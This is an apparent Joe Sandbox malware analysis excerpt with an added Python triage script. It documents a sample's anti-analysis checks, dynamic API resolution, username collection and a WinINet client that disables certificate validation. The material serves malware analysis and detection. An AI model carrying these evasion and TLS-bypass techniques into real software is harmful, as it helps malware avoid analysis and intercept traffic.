                            • Opcode Fuzzy Hash: 9094ac6d500926738430b8e1cc0ed2c03d796947df22dee9bb744fbc2c1fd837
                            • Instruction Fuzzy Hash: 5AA15DB5A19240AFD754DFB8ED58A2637BFF789745300A61EED1683360DBB4A800DB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 451bf0-451c0b call 432a90 call 456390 2146 451c0d 2141->2146 2147 451c1a-451c27 call 432930 2141->2147 2148 451c10-451c18 2146->2148 2151 451c35-451c63 2147->2151 2152 451c29-451c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 451c65-451c67 ExitProcess 2151->2156 2157 451c6d-451c7b GetSystemInfo 2151->2157 2152->2151 2158 451c85-451ca0 call 431030 call 4310c0 GetUserDefaultLangID 2157->2158 2159 451c7d-451c7f ExitProcess 2157->2159 2164 451ca2-451ca9 2158->2164 2165 451cb8-451cca call 452ad0 call 453e10 2158->2165 2164->2165 2166 451cb0-451cb2 ExitProcess 2164->2166 2171 451ce7-451d06 lstrlen call 432930 2165->2171 2172 451ccc-451cde call 452a40 call 453e10 2165->2172 2177 451d23-451d40 lstrlen call 432930 2171->2177 2178 451d08-451d0d 2171->2178 2172->2171 2185 451ce0-451ce1 ExitProcess 2172->2185 2186 451d42-451d44 2177->2186 2187 451d5a-451d7b call 452ad0 lstrlen call 432930 2177->2187 2178->2177 2180 451d0f-451d11 2178->2180 2180->2177 2183 451d13-451d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 451d46-451d54 lstrcpy lstrcat 2186->2188 2193 451d7d-451d7f 2187->2193 2194 451d9a-451db4 lstrlen call 432930 2187->2194 2188->2187 2193->2194 2196 451d81-451d85 2193->2196 2199 451db6-451db8 2194->2199 2200 451dce-451deb call 452a40 lstrlen call 432930 2194->2200 2196->2194 2198 451d87-451d94 lstrcpy lstrcat 2196->2198 2198->2194 2199->2200 2201 451dba-451dc8 lstrcpy lstrcat 2199->2201 2206 451ded-451def 2200->2206 2207 451e0a-451e0f 2200->2207 2201->2200 2206->2207 2208 451df1-451df5 2206->2208 2209 451e16-451e22 call 432930 2207->2209 2210 451e11 call 432a20 2207->2210 2208->2207 2212 451df7-451e04 lstrcpy lstrcat 2208->2212 2215 451e24-451e26 2209->2215 2216 451e30-451e66 call 432a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 451e28-451e2a lstrcpy 2215->2217 2228 451e8c-451ea0 CreateEventA call 451b20 call 44ffd0 2216->2228 2229 451e68-451e8a CloseHandle Sleep OpenEventA 2216->2229 
2217->2216 2233 451ea5-451eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                            APIs
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1708), ref: 00456402
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1720), ref: 0045641A
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF14F8), ref: 00456432
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF93A0), ref: 0045644B
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE62D8), ref: 00456463
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE6358), ref: 0045647B
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1768), ref: 00456494
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF16C0), ref: 004564AC
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1558), ref: 004564C4
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF16D8), ref: 004564DD
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE63D8), ref: 004564F5
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1738), ref: 0045650D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00451C2F
                            • ExitProcess.KERNEL32 ref: 00451C67
                            • GetSystemInfo.KERNEL32(?), ref: 00451C71
                            • ExitProcess.KERNEL32 ref: 00451C7F
                              • Part of subcall function 00431030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00431046
                              • Part of subcall function 00431030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0043104D
                              • Part of subcall function 00431030: ExitProcess.KERNEL32 ref: 00431058
                              • Part of subcall function 004310C0: GlobalMemoryStatusEx.KERNEL32 ref: 004310EA
                              • Part of subcall function 004310C0: ExitProcess.KERNEL32 ref: 00431114
                            • GetUserDefaultLangID.KERNEL32 ref: 00451C8F
                            • ExitProcess.KERNEL32 ref: 00451CB2
                            • ExitProcess.KERNEL32 ref: 00451CE1
                            • lstrlen.KERNEL32(00FF9410), ref: 00451CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451D15
                            • lstrcat.KERNEL32(00000000,00FF9410), ref: 00451D1D
                            • lstrlen.KERNEL32(00464B98), ref: 00451D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D48
                            • lstrcat.KERNEL32(00000000,00464B98), ref: 00451D54
                            • lstrlen.KERNEL32(00000000), ref: 00451D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451D94
                            • lstrlen.KERNEL32(00464B98), ref: 00451D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DBC
                            • lstrcat.KERNEL32(00000000,00464B98), ref: 00451DC8
                            • lstrlen.KERNEL32(00000000), ref: 00451DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451E04
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: e62d341eacd92ff7d7f7804f71cfd226d25f06517812ee88417fc899336574c0
                            • Instruction ID: 344788c40b08b461a8b22847c65d26ac83b229b0d7bf9e32be3f02134fbe7ae8
                            • Opcode Fuzzy Hash: e62d341eacd92ff7d7f7804f71cfd226d25f06517812ee88417fc899336574c0
                            • Instruction Fuzzy Hash: 5C71D731500305AFDB21ABB1DD49B6F777EAF45746F04202AFD0697262DBB89C09C768
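
The function blocks in this report list their Win32 calls in one fixed line format, which makes the listing easy to mine for behaviour: 456390 resolves its imports at run time through GetProcAddress, 451bf0 fingerprints the host (GetSystemInfo, GlobalMemoryStatusEx, VirtualAllocExNuma, GetUserDefaultLangID) and calls ExitProcess when a check fails, and the WinINet routine at 436c40 that follows sets INTERNET_OPTION_SECURITY_FLAGS (0x1F) to 0x00010300 before sending its request. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in this format into per-function call sequences, decodes the security-flag value into SECURITY_FLAG_* names and emits behaviour tags. The tag names, the GetProcAddress threshold and the sample excerpt (a shortened copy of the listings on this page) are my own choices, and the 0x10000 flag name is taken from newer wininet.h versions and should be verified against your SDK.

```python
"""Added example: parse a Joe Sandbox 'APIs' listing into per-function call sequences and behaviour tags."""
import re
from collections import Counter, defaultdict, namedtuple

# The block header names the function; API lines may carry a "Part of subcall function"
# prefix and may or may not have an argument list (compare ExitProcess and lstrcpy above).
FUNC_LINE = re.compile(r"^\s*control_flow_graph\s+\d+\s+(?P<start>[0-9a-fA-F]{6,8})-")
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
HEX_ARG = re.compile(r"^-?[0-9A-F]{8}$")   # Joe prints numeric arguments as 8 hex digits
Call = namedtuple("Call", "func api module args ref sub")  # sub: callee when inherited, else None

INTERNET_OPTION_SECURITY_FLAGS = 0x1F      # second argument of InternetSetOptionA on this page
# SECURITY_FLAG_* bits from wininet.h; 0x10000 (IGNORE_WEAK_SIGNATURE) comes from newer
# SDK headers and is an assumption to verify against your own wininet.h.
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00010000: "SECURITY_FLAG_IGNORE_WEAK_SIGNATURE",
}
# Host-fingerprinting APIs that block 451bf0 pairs with ExitProcess.
ENVIRONMENT_CHECK_APIS = {"GetSystemInfo", "GlobalMemoryStatusEx", "VirtualAllocExNuma", "GetUserDefaultLangID"}

def parse_listing(text):
    """Return the calls in listing order, each attributed to its function block."""
    calls, func = [], None
    for line in text.splitlines():
        m = FUNC_LINE.match(line)
        if m:
            func = m.group("start").upper().zfill(8)
            continue
        m = API_LINE.match(line)
        if m and func is not None:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append(Call(func, m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

def hex_arg(text):
    return int(text, 16) if HEX_ARG.match(text) else None

def decode_security_flags(value):
    """Name the SECURITY_FLAG_* bits of an INTERNET_OPTION_SECURITY_FLAGS value."""
    names = [name for bit, name in SECURITY_FLAGS.items() if value & bit]
    unknown = value & ~sum(SECURITY_FLAGS)          # bits are disjoint, so sum == OR
    return names + ([f"unknown:0x{unknown:08X}"] if unknown else [])

def tag_functions(calls, min_getprocaddress=5):
    """Per function: call count, behaviour tags and any decoded TLS security flags."""
    by_func = defaultdict(list)
    for c in calls:
        by_func[c.func].append(c)
    report = {}
    for func, seq in by_func.items():
        apis, tags, flags = Counter(c.api for c in seq), set(), []
        if apis["GetProcAddress"] >= min_getprocaddress:   # 456390 resolves 27 imports this way
            tags.add("dynamic_api_resolution")
        if apis["ExitProcess"] and ENVIRONMENT_CHECK_APIS & set(apis):
            tags.add("environment_checks_with_exit")
        if apis["InternetOpenA"] and (apis["HttpSendRequestA"] or apis["InternetReadFile"]):
            tags.add("wininet_http_client")
        for c in seq:
            if c.api == "InternetSetOptionA" and len(c.args) > 2 and hex_arg(c.args[1]) == INTERNET_OPTION_SECURITY_FLAGS:
                flags = decode_security_flags(hex_arg(c.args[2]) or 0)
                if any(n.startswith("SECURITY_FLAG_IGNORE_") for n in flags):
                    tags.add("tls_validation_relaxed")
        report[func] = {"calls": len(seq), "tags": sorted(tags), "security_flags": flags}
    return report

# Constructed excerpt of this page's API listings (shortened, same line format).
SAMPLE_LISTING = """\
control_flow_graph 2125 456390-4563bd GetPEB
• GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
• GetProcAddress.KERNEL32(76210000,00FF1708), ref: 00456402
• GetProcAddress.KERNEL32(76210000,00FF1720), ref: 0045641A
• LoadLibraryA.KERNEL32(00FF1888,?,?,?,00451C03), ref: 004565C9
• GetProcAddress.KERNEL32(75B30000,00FF1870), ref: 0045662D
• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004566CC
control_flow_graph 2141 451bf0-451c0b call 432a90 call 456390
  • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
• ExitProcess.KERNEL32 ref: 00451C67
• GetSystemInfo.KERNEL32(?), ref: 00451C71
  • Part of subcall function 00431030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0043104D
  • Part of subcall function 004310C0: GlobalMemoryStatusEx.KERNEL32 ref: 004310EA
• GetUserDefaultLangID.KERNEL32 ref: 00451C8F
• ExitProcess.KERNEL32 ref: 00451CB2
control_flow_graph 2234 436c40-436c64 call 432930
• InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436CD5
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00436D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00436D86
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00436DFF
"""

if __name__ == "__main__":
    print(tag_functions(parse_listing(SAMPLE_LISTING)))
```

Run it as a script to print the per-function report, or pass parse_listing the text of any other block copied from the report. The tags are triage hints rather than verdicts: GetProcAddress-heavy functions also occur in benign packers. The decoded flags are the more actionable part, since SECURITY_FLAG_IGNORE_UNKNOWN_CA means the sample will accept a certificate from a CA it does not trust, so its HTTPS traffic can be intercepted with your own proxy certificate when you replay the C2 exchange.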

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 436c40-436c64 call 432930 2237 436c66-436c6b 2234->2237 2238 436c75-436c97 call 434bc0 2234->2238 2237->2238 2239 436c6d-436c6f lstrcpy 2237->2239 2242 436caa-436cba call 432930 2238->2242 2243 436c99 2238->2243 2239->2238 2247 436cc8-436cf5 InternetOpenA StrCmpCA 2242->2247 2248 436cbc-436cc2 lstrcpy 2242->2248 2244 436ca0-436ca8 2243->2244 2244->2242 2244->2244 2249 436cf7 2247->2249 2250 436cfa-436cfc 2247->2250 2248->2247 2249->2250 2251 436d02-436d22 InternetConnectA 2250->2251 2252 436ea8-436ebb call 432930 2250->2252 2253 436ea1-436ea2 InternetCloseHandle 2251->2253 2254 436d28-436d5d HttpOpenRequestA 2251->2254 2261 436ec9-436ee0 call 432a20 * 2 2252->2261 2262 436ebd-436ebf 2252->2262 2253->2252 2256 436d63-436d65 2254->2256 2257 436e94-436e9e InternetCloseHandle 2254->2257 2259 436d67-436d77 InternetSetOptionA 2256->2259 2260 436d7d-436dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 436dd4-436de4 call 453d90 2260->2263 2264 436daf-436dd3 call 4571e0 call 432a20 * 2 2260->2264 2262->2261 2265 436ec1-436ec3 lstrcpy 2262->2265 2263->2264 2273 436de6-436de8 2263->2273 2265->2261 2276 436dee-436e07 InternetReadFile 2273->2276 2277 436e8d-436e8e InternetCloseHandle 2273->2277 2276->2277 2279 436e0d 2276->2279 2277->2257 2281 436e10-436e15 2279->2281 2281->2277 2283 436e17-436e3d call 457310 2281->2283 2286 436e44-436e51 call 432930 2283->2286 2287 436e3f call 432a20 2283->2287 2291 436e53-436e57 2286->2291 2292 436e61-436e8b call 432a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 436e59-436e5b lstrcpy 2291->2293 2292->2277 2292->2281 2293->2292
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436C6F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436CC2
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436CD5
                            • StrCmpCA.SHLWAPI(?,00FFF918), ref: 00436CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00436D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,00FFF490,00000000,00000000,-00400100,00000000), ref: 00436D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00436D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00436D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00436DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00436DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00436E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00436E8E
                            • InternetCloseHandle.WININET(?), ref: 00436E98
                            • InternetCloseHandle.WININET(00000000), ref: 00436EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00436EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 1c65595b0163d62eeee96e698209719f6d3422af7a0712a357cfc7b4b554c69b
                            • Instruction ID: 1c60e1ed612c4f25c8f9ba7cc00af0018b9a61d6a557402d769de72e40cdaa31
                            • Opcode Fuzzy Hash: 1c65595b0163d62eeee96e698209719f6d3422af7a0712a357cfc7b4b554c69b
                            • Instruction Fuzzy Hash: 6F819271A00316AFDB20DFA5DC45BAF77B9AF48700F115159F905E7281DBB4AD048BA8

                            Control-flow Graph

                            Control-flow graph (function 434a60-434bbe; the executed/not-executed colouring of the original graph is not preserved in this text rendering): RtlAllocateHeap in the entry block 434a60-434afc, which either falls through a short conditional block (434afe-434b03, then 434b06-434b78) or jumps straight to the final block 434b7a-434bbe containing the VirtualProtect call.
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00434AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00434BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 001eac2873da47131b71ead6def0882d47bbb00102271b044bff24a9a94df192
                            • Instruction ID: 6ca8904d3e8d76327d58b75ed15f36c64530825f198f7c2b441f2b6ce6292186
                            • Opcode Fuzzy Hash: 001eac2873da47131b71ead6def0882d47bbb00102271b044bff24a9a94df192
                            • Instruction Fuzzy Hash: DA31F2A8BC032C769E28EBFF4C47F5F6E55DFC5B60B224053740857180E9A95609CAEB
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00452A8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 66d80ddb320549e30eea46a0f46d461751134e1197675510af7b22b240b98bd3
                            • Instruction ID: 2051a2564d8ec1eaf11e6768d0df73c082c4989cfd1b4e00f3202dc58cd4e9fb
                            • Opcode Fuzzy Hash: 66d80ddb320549e30eea46a0f46d461751134e1197675510af7b22b240b98bd3
                            • Instruction Fuzzy Hash: 2CF0B4B1A40244BFC700DF98DD49B9EBBBCF744B21F10021AFD15E3280D7B8190487A1

                            Control-flow Graph

                            Control-flow graph (function 4566e0-4571d3; the executed/not-executed colouring of the original graph is not preserved in this text rendering): a conditional at entry (4566e0-4566e7), a block of 43 GetProcAddress calls (4566ed-456af9), a block of 8 LoadLibraryA calls (456afe-456b92), then further GetProcAddress groups of 5, 8, 5, 6, 12, 5, 2, 2, 10, 4, 1 and 4 calls, each group preceded by a short conditional block that can skip it, ending at 4571d3.
                            APIs
                            • GetProcAddress.KERNEL32(76210000,00FE63B8), ref: 004566F5
                            • GetProcAddress.KERNEL32(76210000,00FE6218), ref: 0045670D
                            • GetProcAddress.KERNEL32(76210000,00FF9888), ref: 00456726
                            • GetProcAddress.KERNEL32(76210000,00FF97C8), ref: 0045673E
                            • GetProcAddress.KERNEL32(76210000,00FF9828), ref: 00456756
                            • GetProcAddress.KERNEL32(76210000,00FFE008), ref: 0045676F
                            • GetProcAddress.KERNEL32(76210000,00FEA6E8), ref: 00456787
                            • GetProcAddress.KERNEL32(76210000,00FFDF78), ref: 0045679F
                            • GetProcAddress.KERNEL32(76210000,00FFDEB8), ref: 004567B8
                            • GetProcAddress.KERNEL32(76210000,00FFDF18), ref: 004567D0
                            • GetProcAddress.KERNEL32(76210000,00FFDFF0), ref: 004567E8
                            • GetProcAddress.KERNEL32(76210000,00FE61D8), ref: 00456801
                            • GetProcAddress.KERNEL32(76210000,00FE6138), ref: 00456819
                            • GetProcAddress.KERNEL32(76210000,00FE63F8), ref: 00456831
                            • GetProcAddress.KERNEL32(76210000,00FE6438), ref: 0045684A
                            • GetProcAddress.KERNEL32(76210000,00FFDF90), ref: 00456862
                            • GetProcAddress.KERNEL32(76210000,00FFE020), ref: 0045687A
                            • GetProcAddress.KERNEL32(76210000,00FEA9E0), ref: 00456893
                            • GetProcAddress.KERNEL32(76210000,00FE6498), ref: 004568AB
                            • GetProcAddress.KERNEL32(76210000,00FFDFD8), ref: 004568C3
                            • GetProcAddress.KERNEL32(76210000,00FFDF00), ref: 004568DC
                            • GetProcAddress.KERNEL32(76210000,00FFDFA8), ref: 004568F4
                            • GetProcAddress.KERNEL32(76210000,00FFDFC0), ref: 0045690C
                            • GetProcAddress.KERNEL32(76210000,00FE61B8), ref: 00456925
                            • GetProcAddress.KERNEL32(76210000,00FFE038), ref: 0045693D
                            • GetProcAddress.KERNEL32(76210000,00FFDEE8), ref: 00456955
                            • GetProcAddress.KERNEL32(76210000,00FFDF30), ref: 0045696E
                            • GetProcAddress.KERNEL32(76210000,00FFDE88), ref: 00456986
                            • GetProcAddress.KERNEL32(76210000,00FFDED0), ref: 0045699E
                            • GetProcAddress.KERNEL32(76210000,00FFDEA0), ref: 004569B7
                            • GetProcAddress.KERNEL32(76210000,00FFDF60), ref: 004569CF
                            • GetProcAddress.KERNEL32(76210000,00FFDF48), ref: 004569E7
                            • GetProcAddress.KERNEL32(76210000,00FFD918), ref: 00456A00
                            • GetProcAddress.KERNEL32(76210000,00FEFDB8), ref: 00456A18
                            • GetProcAddress.KERNEL32(76210000,00FFDB58), ref: 00456A30
                            • GetProcAddress.KERNEL32(76210000,00FFD9F0), ref: 00456A49
                            • GetProcAddress.KERNEL32(76210000,00FE6238), ref: 00456A61
                            • GetProcAddress.KERNEL32(76210000,00FFDA80), ref: 00456A79
                            • GetProcAddress.KERNEL32(76210000,00FE6278), ref: 00456A92
                            • GetProcAddress.KERNEL32(76210000,00FFDA08), ref: 00456AAA
                            • GetProcAddress.KERNEL32(76210000,00FFDA98), ref: 00456AC2
                            • GetProcAddress.KERNEL32(76210000,00FE64B8), ref: 00456ADB
                            • GetProcAddress.KERNEL32(76210000,00FE6298), ref: 00456AF3
                            • LoadLibraryA.KERNEL32(00FFDA20,0045051F), ref: 00456B05
